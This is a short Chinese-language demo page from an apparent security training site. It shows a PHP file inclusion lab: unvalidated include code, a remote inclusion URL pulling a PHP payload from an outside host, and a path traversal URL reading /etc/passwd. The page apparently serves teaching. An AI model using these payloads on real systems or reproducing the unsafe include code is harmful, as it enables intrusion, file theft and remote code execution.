文件包含漏洞_include_require_远程文件包含_本地文件包含_读取网站源码_包含webshell

文件包含演示-本地文件包含

我是被包含的文件的内容,
我来自于 home.php
/home/wwwroot/www.nanhack.com/payload/include/home.php

从PHP5.2开始allow_url_include就默认为Off了，而allow_url_fopen一直是On的。
远程文件包含，需要配置allow_url_include，allow_url_fopen为on

http://www.nanhack.com:8888/include/index.php?page=http://www.hacker.wang/php.txt

包含ect/passwd

http://www.nanhack.com:8888/include/index.php?page=../../../../etc/passwd

# 程序源码如下：


                    <?php
                    if(isset($_GET['page'])){  

                    $path = $_GET['page'];

                            include $path; 

                    }else{ 

                            include "home.php"; 

                    } 

                    ?>

© Copyright 2021 版权所有（一极教育科技有限公司）

津公网安备 12011602000477号津ICP备17008032号-2
本站一切信息皆遵守中华人民共和国法律，如发现任何不良信息，请拨打电话：18622800700
网络安全培训、企业合作、院校合作: 15320004362（手机同微信）